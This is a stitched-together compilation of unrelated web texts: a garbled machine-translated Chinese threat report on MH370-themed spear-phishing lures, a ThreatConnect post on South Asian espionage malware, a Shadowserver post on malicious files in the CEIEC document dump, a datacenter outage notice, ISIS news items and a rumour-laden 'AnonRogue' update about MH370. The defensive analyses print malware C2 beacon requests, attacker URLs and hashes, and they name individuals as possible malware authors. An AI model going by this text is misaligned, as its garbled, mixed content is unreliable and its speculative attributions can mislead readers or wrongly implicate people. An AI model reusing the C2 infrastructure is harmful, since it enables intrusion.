E:\工作\ T5000 \ T5安裝\碼ResN \發布\ ResN32.pdb F:\ WORK \ PROJECT \ T5安裝\ InstDll \發布\ InstDll.pdb
該Mongall /獵誘劑
另一個樣品借力失踪客機的主題就已經出現在3月12日,2014年該惡意文檔利用CVE-2012-0158和題為“缺少馬來西亞航空航班370.doc”(MD5:467478fa0670fa8576b21d860c1523c6)。 雖然擴展看起來像一個Microsoft Office .doc文件,它實際上是一個.html應用程序(HTA)文件。 一旦攻擊成功,有效載荷使自己持續通過添加Windows快捷方式(.lnk)文件指向在開始菜單​​“啟動”文件夾中的惡意軟件。 該信標出站到comer4s.minidns網[。]:8070。 網絡回調圖案,如下所示,已知通過研究人員稱為“Mongall”或“獵”:
GET / 3010FC080 [刪除] HTTP / 1.1 用戶代理:Mozilla的/ 4.0(兼容; MSIE 6.0;美國威斯康星州NT 5.0; .NET CLR 1.1.4322)
3月18日2014年題為“Malysia航空公司MH370由Pakistan.zip劫持”的樣品被送到一個ZIP文件 (MD5:7dff5c4ae1b1fea7ecbf7ab787da3468)包含偽裝成PDF格式在Windows屏幕保護程序文件 (MD5:b03edbb264aa0c980ab2974652688876)。 ZIP文件託管於199.91.173.43。 這個IP地址是以前使用託管惡意文件。
屏幕保護程序文件放置“winservice.exe”(MD5:828d4a66487d25b413cb19ef8ee7c783),它開始向信標199.91.173.45。 這個IP地址是以前用來舉辦了題為“obl_leaked_report.zip”文件(MD5:a4c7c79308139a7ee70aacf68bba814f)。
POST /path_active.php?compname=[HOSTNAME]_[USERNAME] HTTP / 1.1 主持人:
接受: */*
內容類型:應用程序/ x www的窗體-urlencoded
最後一個惡意文件被視為濫用失踪飛行370的故事3月18日,2014年該文件利用CVE-2012-0158和題為“MH370 PM聲明14年3月15日 - FINAL.DOC”(MD5:5e8d64185737f835318489fda46f31a6)。 本文下降了Backdoor.APT.Page植入並連接到122.10.89.85這兩個端口80和443端口80的初始燈塔流量可如下操作:
GET /18110143/page_32180701.html HTTP / 1.1 接受: */*
餅乾:XX = 0; BX = 0
用戶代理:Mozilla的/ 4.0(兼容; MSIE 8.0; Win32的)
雖然許多APT者們採取了戰略網頁妥協作為傳遞載體,顯而易見的是,矛,通過基於電子郵件的附件或鏈接釣魚zip文件仍然很受歡迎與許多威脅的演員,尤其是在與誘惑討論當前的媒體活動配對。 網絡維護者應該將這些事實為他們的用戶培訓計劃,並提高警戒定期的矛釣魚運動,它利用的話題佔據了消息循環。


 August 2, 2013.

Where There is Smoke, There is Fire: South Asian Cyber Espionage Heats Up

 UPDATE: Operation Arachnophobia has the latest updates on this intelligence. Download the report now and read more on our blog .


The global proliferation of cyber espionage may be serving as a catalyst for regional entities within South Asia to adopt their own cyber espionage capabilities. Irrespective of the threats sophistication or motivation, South Asian cyber threats are likely emulating behaviors of larger regional powers to strategically influence national, organizational or individual objectives.
The ThreatConnect Intelligence Research Team (TCIRT) has identified an example of South Asian cyber espionage that is likely transcending sectors and regional geographic boundaries. Analyses of multiple customized malware binaries hosted within a small US subnet have likely been used to target Indian military or government entities. The malware contains specific artifacts that point to a commercial Pakistani entity. Although the TCIRT cannot conclusively confirm direct involvement, several hypotheses have been developed which may account for the malware and observed activity. All of the following information and threat indicators are available within ThreatConnect.com and have been shared with the ThreatConnect community.
Operational Caveat: The ThreatConnect Intelligence Research Team has contacted the affected service providers and notified them of the activity observed.
Details associated with this threat have been shared with the ThreatConnect Community within Incident “20130731A: South Asia Cyber Espionage Heats Up”.

It Takes Two to Tango:

Globalization has woven the Internet into a fabric that interlaces practically every aspect of modern living. Throughout the years, as evidenced in countless media reports, world superpowers have recognized and utilized the Internet as a powerful source for intelligence collection, and on occasion we have been offered glimpses as to how they are leveraging cyber espionage in support of their national diplomatic, military or economic objectives.
Similar to a younger sibling looking up to a big brother, regional and middle powers within South Asia are seeking to leverage global cyber espionage in an effort to achieve parity with nation states who have far-reaching diplomatic power, modernized militaries and influential economies. Ultimately, these emergent economies are likely seeking to hasten their path to success in fulfilling national objectives via the “short-cut” that cyber espionage offers.
Individual countries within the Indo-Pak subcontinent are increasingly involved in cyber attacks and targeted espionage campaigns. South Asia is no stranger to deeply rooted conventional conflict which is most often a strong harbinger of cyber conflict. On March 17th, 2013, the Norwegian-based, global telecommunications provider Telenor reported a network breach from an unknown sophisticated threat actor that targeted Telenor executives using custom malware implants. The attackers were responsible for pilfering email archives and documents from Telenor executives, compromising their intellectual property and business operations.
Nearly two months later, the Norwegian antivirus and security firm Norman issued an investigative analysis report titled Operation Hangover: Unveiling an Indian Cyberattack Infrastructure that detailed cyber espionage activities associated with the Telenor compromise. They noted similar targeting campaigns that were observed exploiting numerous industries and organizations within Norway, Pakistan, US, Iran, China, Taiwan, Thailand, Jordan, Indonesia, UK, Germany, Austria, Poland, and Romania. Norman speculated that a group associated with an identified private Indian information security company likely carried out the espionage campaigns.
Norman's 43 page assessment concluded that a sophisticated Indian exploitation team was indeed responsible for the network breach and Telenor compromise. The TCIRT believes that a possible theory that supports an Indian attack scenario is that the Telenor subsidiary, Telenor Pakistan , is a strategic communications infrastructure provider. Telenor Pakistan provides voice, data content and mobile communications to more than 3,500 cities and towns within Pakistan. Persistent remote Indian access to a strategic communications service provider, such as Telenor Pakistan, would certainly yield unparalleled signals intelligence collection capability. The information obtained would be of strategic value to Indian intelligence services.

New Findings:

In light of the recent revelation of Indian involvement in the targeting of Telenor, it is critical for us to consider the borderless nature of cyber espionage and to understand how regional cyber conflicts can spill across geographies and affect critical commercial business operations.
As part of an ongoing TCIRT focused research and analysis, we have found custom malware being used operationally “in the wild” that may be targeting Indian military and government related entities, as well as other unidentified South Asian targets. This activity is possibly linked to an identified Pakistani information security company.

The Malware:

In late May 2013, TCIRT identified a malicious file hosted at [http://]199.91.173[.]43/new_salary/salary_revision.scr (Kansas City, Missouri). This file was a self-extracting (SFX) archive that, when executed, presents the target victim with a 12 page decoy PDF document. The document was an official Government of India (GoI), Ministry of Defense (MoD) pension memorandum of record. It is highly likely that the malware and decoy document would be tailored for and delivered to specific recipients associated with the GoI or MoD.
The SFX dropper contained multiple custom executable files, as well as legitimate Microsoft Visual C++ Runtime Library files, which are part of the codebase used to develop and required to execute the backdoor code. The malware also uses the legitimate cURL library in the form of libcurld.dll. The open-source cURL library is a multiprotocol transfer library used primarily for FTP and HTTP transactions.
The main backdoor component is found in winsocks.exe . The files ExtractPDF.exe and Start.exe simply serve as utilities to open the PDF file and execute the winsocks.exe backdoor component. When executed, the winsocks.exe backdoor requests a PHP update callback at [http://]199.91.173[.]43/fetch_updates_8765.php?compname=<COMPUTERNAME>.
A version.txt file is also requested by the malware. This file contained a version number 1.0, likely denoting the version of the backdoor and/or the command and control (C2) backend. The winsocks.exe backdoor also contains hardcoded strings of Office file extensions, telegraphing the likely intention of the attackers in collecting and exfiltrating office automated documents from victim networks.
Another variant of this backdoor uses the same winsocks.exe with a different dropping mechanism and was found at [http://]199.91.173[.]43/Classified_Video.flv.scr and [http://]199.91.173[.]43/sarbajit_leaked_video.wmv.scr. Both of these .scr files have the same MD5 .
In this SFX, Windows batch files had replaced the ExtractPDF.exe and Start.exe with a decoy Flash video (FLV) file was used in place of the decoy PDF. An FLV file is an interesting choice of decoy document since it is not a standard video format for media players. The dynamic DNS domains windowsupdate.no-ip[.]biz and masalavideos.no-ip[.]biz were also being mapped to IP Address as of late May 2013, when the video themed malicious attachments were being operationalized. When opened the flash video simply displays a couple kissing passionately. Implementing the use of free dynamic DNS services, such as those of NO-IP within targeting and exploitation phases of attack, are very common techniques used by a variety sophisticated threat groups.
The file sarbajit_leaked_video.wmv.scr contains a compile time of May 28, 2013 19:53:26 UTC. The filename is possibly a misspelled reference to Sarabjit Singh, an Indian national who was arrested and convicted of terrorism and espionage charges in 1991 by Pakistani authorities. After a protracted 22 year legal battle, Sarabjit Singh would become the victim of a severe beating by Pakistani prisoners and would later die of his injuries in a Lahore hospital on May 2, 2013. News of the attack and subsequent death of Sarabjit Singh incited protests in India that increased regional Indo-Pakistani tensions and served as a catalyst for bilateral governmental negotiations between Delhi and Islamabad. This file was created 26 days after the death of Sarabjit Singh, and would be of relevance to targeted Indian entities, much like the official Government of India (GoI), Ministry of Defense (MoD) pension memorandum.

Significant Malware Artifacts:

Operational Caveat: It is important to note that there are information gaps which diminish our ability to establish a definitive explanation for the malicious activity and identify the responsible entities behind the authorship and use of the identified malware. Below the TCIRT simply highlights the facts associated with specific artifacts identified within the malware.
Most of the dropped malware binaries contained a debug string that sheds light on the possible developers and operators of the malware.
The significance of the username Tranchulas within the debug path of the winsocks.exe binary is that Tranchulas is a Pakistani information security consulting company with offices in the United Kingdom, United States, and Pakistan. The CEO of Tranchulas is Zubair Khan , a Pakistani national and information security executive who has “been researching mainly on [sic] cyber warfare”. Khan also likely maintains a close relationship to the Pakistani government. According to this online biography , he is responsible for the penetration testing of Pakistani homeland security solutions and has consulted for the Pakistani National Database and Registration Authority ( NADRA ).
Proximity to such sensitive security programs suggest a certain level of trust on behalf of the Pakistani government, and may indicate that official Pakistani entities could have access to Tranchulas technical support for various security projects or programs. An ironic, yet noteworthy observation is that the Tranchulas website boasts Telenor as a client.
Tranchulas also serves as an official sponsor for the Pakistan CERT in addition to maintaining the official Pakistan CERT website (cert.org.pk).
On July 2, 2013 a similar file windefender.exe (MD5: a21f2cb65a3467925c1615794cce7581 ) was identified containing a strong association to Tranchulas. This particular binary contained the following debug string:
C:Usersumairaziz27DocumentsVisual Studio 2008ProjectsusbReleaseusb.pdb
The username “UmairAziz27” reveals a Twitter account @umairaziz27 for an “Optimistic Patriot by choice” who is “Working as InfoSec Analyst at @Tranchulas .”
Umair Aziz ( umairaziz27 ) maintains a LinkedIn professional profile that highlights his employment at Tranchulas and reveals that he was educated at the National University of Sciences and Technology School of Electrical Engineering and Computer Science (NUST-SEECS) in Pakistan.
A second host within the same 199.91.173[.]40/29 subnet was also identified hosting similar zipped malware at [http://]199.91.173[.]45/OBL_Leaked_Report.zip and [http://]199.91.173[.]45/Naxalites_Funded_By_Pakistan.zip. The OBL_Leaked_Report.zip contained a .scr file that drops a decoy document pertaining to the alleged incompetence of Pakistani authorities in locating Osama Bin Laden (OBL).
This OBL malware drops a windefender.exe backdoor component (MD5: 35663e66d02e889d35aa5608c61795eb ) In this case, the debug string is:
C:UsersCert-IndiaDocumentsVisual Studio 2008ProjectsufileReleaseufile.pdb.
The binaries that contain the “umairaziz27” and “Cert-India” debug strings are designed to call back to [http://]199.91.173[.]45/fetch_updates_8765_tb.php?compname=<COMPUTERNAME> and [http://]199.91.173[.]45/is_array.php?compname=<COMPUTERNAME>. Meanwhile, the Naxalites_Funded_By_Pakistan.scr file drops a slightly different malware component and an alternate decoy document.
The dropped implant, showppt.scr (MD5: 165ac370b54e664812e4c15b2396ccd6 ), is a downloader that connects to [http://]199.91.173[.]45/ and downloads both legitimate library files and malicious second stage binaries.

Working Hypotheses:

The use of Tranchulas and UmairAziz27 in the malware debugging paths, in addition to the multiple targeting campaigns that maintain themes likely aimed at Indian entities or involving Pakistan related issues, leads us to assess the following competing hypotheses which may be considered as plausible explanations for the identified activity:
  • Hypothesis 1: Tranchulas developed the malicious binaries, and staged them for offensive exploitation operations on behalf of an unidentified customer.
  • Hypothesis 2: Tranchulas developed and sold the malicious binaries to an unidentified customer, where they were later operationalized by an unidentified entity.
  • Hypothesis 3: An unidentified third party unaffiliated with Tranchulas developed the malware, deliberately including misleading software artifacts as a direct effort to create speculation and shift blame toward Tranchulas.
  • Hypothesis 4: A rogue Tranchulas employee used company resources without company knowledge to develop the malware, where an unknown operator later used it offensively.
  • Hypothesis 5: Indian entities actively sought and utilized the services of Pakistan based information security company, Tranchulas, for an officially sanctioned and authorized penetration test. The malicious implants were subsequently developed and used as part of official Tranchulas service offerings, while the files and infrastructure used for the audit were submitted to publicly available malware analysis services.
  • Hypothesis 6: An unidentified Indian entity developed and used this malware as a realistic simulated exercise to perform penetration testing and evaluate their readiness in the event of actual Pakistani affiliated offensive network operations. The files and infrastructure used for the simulation were submitted to publicly available malware analysis services.


Considering the long-standing regional tensions between India and Pakistan, South Asia serves as a likely flashpoint for conventional conflict to carry over and play out within cyberspace. Public and private sectors alike should begin to increase their awareness of emerging cyber threats from the lesser-known middle powers. Regardless of sophistication, these threats may support future belligerents who have or will eventually possess the capability and intent to disrupt critical business operations.
Details associated with this threat have been shared with the ThreatConnect Community within Incident “ 20130731A: South Asia Cyber Espionage Heats Up ”. If you or your organization is interested in obtaining crowd-sourced threat intelligence that increases your awareness of emerging cyber threats, please register at ThreatConnect.com and join our community.
UPDATE: Operation Arachnophobia has the latest updates on this intelligence. Download the report now and read more on our blog .



Beware of what you download. Recent purported CEIEC document dump booby-trapped.

Posted on April 16, 2012 | Category : Malware , Targeted Intrusions | Comments Off on Beware of what you download. Recent purported CEIEC document dump booby-trapped.
In recent weeks thousands documents have been released online by a hacktivist going by the online moniker of “ Hardcore Charlie .” These documents appear to have potentially been sourced and possibly stolen from various businesses and governments in different countries including the United States, the Philippines, Myanmar, Vietnam, and others. In particular Hardcore Charlie has been attempting to draw attention to some of the documents that apparently relate to US military operations in Afghanistan. The twist in all of this is that the documents are purported to have been stolen by Hardcore Charlie from the Beijing based military contractor China National Import & Export Corp (CEIEC). If true, that would mean that the documents were stolen at least twice. These are allegations that CEIEC has strongly denied and condemned in a post on their website .
This entire turn of events has raised more questions than they have answered. Are the documents legitimate? Where were they originally stolen from? If these were really stolen twice, who stole them first? We unfortunately do not have the answer to any of these questions. However, one thing we do have are words of caution and some interesting information about a handful of the documents found in this dump. Within the document dump in a folder related to Vietnam are 11 malicious documents (8 unique) that exploit vulnerabilities (CVE-2010-3333 and CVE-2009-3129) in Microsoft Office to install malware. These documents installed four different types of backdoors that reported back to six distinct command and control servers. Two of the backdoors were unfamiliar two us and the other two were the well known Poison Ivy RAT and the Enfal/Lurid. At least one hostname could be tied back to a known set of persistent actors engaged in cyber espionage.

Malicious Documents Details

The initial file CEIECOWNED_PT1.rar contained over 1200 documents split up into multiple folders. All 11 of the malicious documents were found in a folder named MONRE_VIETNAM_PT1. Below are the details of each of the malicious documents along with the hostname or IP address that the dropped backdoors attempt to communicate with. Note that each command and control server that used DNS utilized a free China or US-based dynamic DNS provider.

A Look at the Dropped Malware

Poison Ivy

Two out of the nine unique samples installed the popular Poison Ivy RAT upon successful exploitation. Both samples beacon back to www.ollay011.zyns.com, which at the time of this writing and since last Thursday has resolved to (Hurricane Electric, US). A closer look at the configuration of this Poison Ivy instance shows that it was setup to use the default password of ‘admin’, wrote itself to C:\WINDOWS\explorer.exe and started a keylogger that gets saved as C:\WINDOWS\explorer.


One of the samples installed the far less common, but very well known, Enfal/Lurid trojan. This particular trojan has been frequently associated with targeting of the Tibetan community, the India Government, and other governments and industries in specific geo-locations. It’s previously been discussed over the last four years in theISC Sans Diary, the Shadows in the Clouds Report, and the Trend Micro Lurid Downloader Report. The sample from these files used l1x.lflinkup.net as the command and control server to report in information about this system. At the time of this writing the hostname resolved to, a dynamic IP address pool in China. Tracking this hostname back for several months, we can see it has resolved to numerous other short-lived dynamic IP addresses in China. It is also interesting to note that along with the Vietnamese file names, this malware samples installed itself as C:\Program Files\UniKey 2000\UniKey.exe. UniKey is a software-based Vietnamese keyboard for Windows. We can speculate that there is likely actors utilizing the Enfal/Lurid trojan to engage in persistent targeting of Vietnamese interests.


A backdoor for which we do not have a name was observed in six out of the nine samples, all using the CVE-2010-3333 exploit to drop their payloads. Once installed the malware seemed to copy itself into the User’s Application Data folder, as well as at least one other location on the system (often in Program Files). The malware always appears to write a configuration file with the name name msgslang.db. A search for this file name on the web shows several other similar or related samples. The samples that installed this backdoor all beaconed back to one of these DNS names front11.gicp.netcongtytancang.uicp.net, or kullywolf.gicp.net. Only the last two have resolved recently congtytancang.uicp.net and kullywolf.gicp.net has actively changed IP addresses several times since last week. At the time of this writing the two hosts names resolve to and respectively. It is worth noting the the third-level of the DNS name congtytancang.uicp.net, appears to be written in Vietnamese and may translate back to something having to do with “Newport” or “Seaport” in English.


The single Microsoft Excel exploit in the packet dropped malware that beaconed back to and likely a variety of other embedded IP addresses. This malware samples was not one that we recognized. However, the sample contains several interesting strings, to include “Welcome To TANTOUMA Version 2.2 BY ICU @20110210” and others that indicate the backdoor is designed to collect information from an infected system and provide remote access to it. The sample also had www.google.com.vn in its strings output, lending further credence that some of the files may be related to concerted efforts to persistently target the Vietnamese.

Connection to the Google and RSA Breaches

Did your eyes just get big or roll? Good. Sorry we are just kidding — there’s no connection.

Vietnamese Targeting and Timeline

These nine unique samples from the document dump from Hardcore Charlie appear to lead to multiple different attack campaigns targeting Vietnamese interests. The malicious documents have Vietnamese names and will open legitimate clean versions of the documents in Vietnamese upon successful exploitation. At least one of the trojan samples even saves itself as a file that might blend in on a Vietnamese computer. Another has strings related to the Vietnamese version of Google, while another uses a DNS name that is in Vietnamese as well. We would suspect this may just be the tip of the ice berg.
As for timing — several indicators seem to point to these documents being approximately a year old. The most obvious and more tamper proof piece of evidence being aVirusTotal submission from April 2011. You may note the document from this submission was named BC cua chi binh voi BCS.doc. However, this file has the same MD5 hash of of32f5ad4f09135fcdde86ecd4c466a993, which matches the file was saw named Danh sach.doc. This indicates that his activity is not new and these files may have been unknowingly included in this document dump.


These malicious documents within the data dump raise several questions and can lead to plenty of speculation. Were these malicious documents resident on victim systems from previous targeted APT campaigns and exfiltrated alongside the legitimate documents as part of another cyber espionage operation? Could it be that they were intentionally placed into this data dump? Anything is possible and we do not have all the answers. However, we can tell you that a few of the malware samples had previously been submitted to VirusTotal in early 2011. Additionally meta data of the clean documents dropped by a few of the malware payloads showed that the documents were also created in 2011, indicating that the malicious documents have likely been circulating in the wild for more than year.
Although many questions remain, the following facts are clear:
  • A small subset of the documents contained in the purported CEIEC dump are malicious.
  • These malicious documents drop a mix of malware families including Poison Ivy, Enfal/Lurid and two unnamed families.
  • Some of the malware samples extracted from the CEIEC dump connect to infrastructure used in previous APT campaigns.
These documents just go to show that malicious files can end up pretty much anywhere. We are stating the obvious but remember to exercise caution when viewing files you downloaded from the Internet. Microsoft patched the two vulnerabilities used in these attacks quite some time ago. They patched CVE-2009-3129 with MS09-067 and CVE-2010-3333 with MS10-087. Malicious documents that exploit vulnerabilities in Microsoft Office, Adobe Acrobat [Reader], or components loaded by these pieces of software are still some of the most common ways in which cyber espionage attacks are conducted. Staying current with the latest versions and security patches for any software you run is highly recommended.



How two seconds become two days

Posted on November 17, 2015 | Category : Maintenance , Oops | No Comments on How two seconds become two days
At 3:37PM PST, we had a power blip in one of our datacenters. In those two seconds, over 1,000 systems blinked offline. As a non-profit, we don't have all of those niceties such as hot-hot datacenters or those new fangled UPSes. Instead, we do it the old fashioned way, which means we are susceptible to power failures within the building our core systems reside.
Due to the time it takes to bring it all back online and the fact the outage took place during our daily report runs, it will take us a couple days to work through the backlog of reports. What this means is that if you receive our reports , you may receive them up to 48 hours late this week. Don't worry, we'll eventually catch back up and everything will be back to normal soon!
We're not sure what caused the outage, but my money is on malicious raccoons , colluding with criminals.



ISIS starts building an air force in Libya

Officials reveal ISIS using flight simulators to train pilots in Libya; UN report lists up to 3,000 ISIS jihadists in the strategic state.
 By Ari Yashar
First Publish: 12/2/2015, 8:08 AM / Last Update: 12/2/2015, 9:23 AM.

Flight simulator (illustration)
Flight simulator (illustration)
Melanie Fidler/Flash 90
Islamic State (ISIS) terrorists in the port city of Sirte, located in northern Libya, are learning to fly planes using at least one flight simulator according to military officials in the strategically situated North African state.
The sources were quoted by the London-based Arabic Asharq Al-Awsat as saying they aren't sure how a civilian plane simulator, and apparently a fighter jet one as well, got into the jihadists' hands in Sirte, the birthplace of Libya's former dictator Muammar Gaddafi who was deposed in 2011.
"It's a modern simulator, which apparently arrived from abroad," the sources were cited as saying, noting that it was roughly the size of a small car. The simulator is replete with a steering wheel to practice take-off and landing, a radar screen, and communications devices to contact the control tower.
A senior Libyan military officer confirmed the information to the paper in an interview held in Cairo. He noted that the ISIS group, which includes former officers in the Libyan army and neighboring armies, succeeded in acquiring a civilian flight simulator in October.
The officer said security forces received information in the last two weeks indicating that the ISIS fighters also obtained a fighter jet simulator of an unspecified type. Another senior security source said the Lebanese air force tried several times to hit the base where the flight training is thought to be being conducted, but did not succeed in the attempts.
ISIS has in the past captured fighter jets in Iraq and Syria, leaving open the potential that terrorist pilots would head from Libya back to those countries in order to launch an ISIS air force of sorts. Another potential risk is that the terrorists could hijack planes and crash them into sensitive sites, as was done by Al Qaeda terrorists in the infamous September 11, 2001 attacks.
3,000 ISIS jihadists
The revelation comes the same Tuesday that UN experts released a report revealing ISIS has between 2,000 and 3,000 terrorists in Libya, and intends to capture more territory in the strategic state.
Eight independent experts appointed to monitor sanctions against Al Qaeda and ISIS wrote the 24-page report, which said ISIS's central command views Libya "as the 'best' opportunity to expand its so-called caliphate" from Syria and Iraq, reports Associated Press.
Concerns are high given that Libya is located on the Mediterranean Sea and provides a strategic point of transit to Europe.
The experts wrote that the ISIS group in Libya is the only known affiliate of the jihadist group abroad that receives direct support and guidance from ISIS headquarters.
There are two reasons for the focus on Libya, firstly because around 800 Libyans who fought for ISIS in Syria and Iraq have now returned to Libya to fight for the group there, and secondly because ISIS is sending emissaries to Libya with direct instructions.
Ever since the 2011 "Arab Spring" in which Gaddafi was killed, oil-rich Libya has been embroiled in chaos and divided between an elected government in the eastern port city of Tobruk, and an Islamist militia government in the capital of Tripoli.
ISIS's presence in Libya hit headlines in February when it broadcast the brutal mass execution of 21 Coptic Christians, triggering reprisal air raids from Egypt and a mass-exodus of Egyptian workers from the country.
In March, ISIS terrorists published a video in which they vowed that their conquest in Libya will serve as a springboard for a European invasion.



Islamic State in Syria beheads alleged Russian spy 嵌入永久的圖片連結

Islamic State in Syria beheads alleged Russian spy

The group release video showing man sitting in an orange jumpsuit and giving details of his apparent recruitment by Russian intelligence services

 Militant Islamist fighters hold the flag of Islamic State (Isil) while taking part in a military parade along the streets of northern Raqqa province in this June 30, 2014 file photo. 2014 saw the rise of the Sunni militant group Islamic State, which has seized swathes of territory in both Syria and Iraq.

Isil militants take part in a military parade along the streets of northern Raqqa Photo: REUTERS.

The Islamic State jihadist group released a video on Wednesday purporting to show the execution of an alleged Russian spy in Syria.
The video, which was circulated on social media, showed a prisoner wearing the orange tunic and trousers often seen on captives in IS's videos.
It is the first video from the group to show the apparent execution of a Russian since Moscow began air strikes in support of Syria's government on September 30.


-更新-[02/12-2015]-由偉大俠義匿名" AnonRogue "的最準確資訊的分享,上文的各式分析可能還未令讀者弄清楚!加載同樣由偉大俠義匿名" AnonRogue "的最新最準確資訊的分享!土耳其被大陸獨裁狡猾妖魔習近平污蔑了!-虛偽極,,沒有誠信習近平獸,欺騙俄羅斯總統普京先生的謊言??!-Also Thanksgiving~

-[01/12-2015]Update- From the great chivalrous Anonymous '' AnonRogue '' tribes - to find the most authentic evidence, citing the {ntdtv.com} detailing News: "Malaysia Airlines MH370 missing alarming news!"-
